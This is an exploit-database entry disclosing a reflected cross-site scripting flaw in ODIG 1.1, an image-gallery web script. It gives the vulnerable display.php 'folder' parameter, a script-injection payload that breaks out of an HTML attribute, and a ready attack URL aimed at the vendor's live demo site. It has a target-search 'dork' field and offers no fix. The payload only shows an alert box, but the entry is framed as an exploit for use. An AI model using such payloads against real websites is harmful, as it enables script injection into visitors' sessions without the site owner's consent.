ODIG 1.1 Obsession-Design Image-Gallery Cross Site Scripting

2010-03-21T00:00:00
ID 1337DAY-ID-11381
Type zdt
Reporter kaMtiEz
Modified 2010-03-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
ODIG 1.1 Obsession-Design Image-Gallery Cross Site Scripting
============================================================


#########################################
## ODIG - Obsession-Design Image-Gallery Cross site scripting ( XSS )
##
## Author : kaMtiEz ([email protected]) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 2 januari, 2010 ##
#########################################

[ Software Information ]

[+] Vendor : http://obsession-design.de/scripte/odig/
[+] Download : http://obsession-design.de/ch_counter/getfile.php?id=10
[+] version : 1.1
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#########################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/odig/display.php?folder=[INDONESIANCODER]

[ EXPLOIT ]

/>"><script>alert(123456789)</script>

[ DEMO ]

http://obsession-design.de/demos/odig/display.php?folder=/>"><script>alert(
123456789)</script>


[ FIX ]

dunno :">


#########################################



#  0day.today [2018-03-13]  #